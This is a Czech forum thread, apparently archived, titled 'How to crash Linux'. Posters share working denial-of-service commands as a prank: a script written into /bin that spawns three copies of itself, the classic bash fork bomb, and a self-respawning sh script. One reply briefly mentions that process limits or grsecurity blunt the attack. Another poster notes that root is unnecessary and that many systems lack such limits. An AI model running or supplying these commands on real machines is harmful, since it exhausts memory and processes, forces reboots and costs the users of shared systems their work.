Ashus.ashus.net

Full Version: Jak shodit Linux
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Tahle srandička je logicky možná použít na jakémkoli systému, kde máte práva spouštět.
Příkaz vytvoří skript, jehož jediným úkolem je spustit sám sebe třikrát. Každá instance se opět rozmnoží, až se zaplní celá pamět, pak i virtuální pamět, a pak už je systém nepoužitelný a zbývá restart.

Do shellu se zadá
poprvé:
Code:
cd /bin; echo "./dff;./dff;./dff" > dff; chmod +x dff; ./dff &

pak stačí už jen:
Code:
cd /bin; ./dff &

Zdroj: James Keats

Zdeněk Burda

To co jsi sem napsal je na nic, protože musíš být root. Zajímavější je spustit
Code:
:(){ :|:& };:
v bashi nebo si udělaat skript

Code:
#!/bin/sh
:0&
exec $0

a ten spustit.

Každopádně počítej s tím, že to nemusí systém poslat do kopru, ale jen na chvíli zatížit. Rozumný admin má totiž nastavené limity (viz man bash) pro spouštění procesů případně používá nějaký systém typu grsecurity který je schopný spoustě nekalostem zabránit.
Pěkné. No nemusím mít roota, stačí mít práva spouštět, skript se dá schovat i jinam, ne?
A spousta lidí to ošéfované nemá. :mrgreen:
To co jsi sem napsal je na nic, protože musíš být root. Zajímavější je spustit ?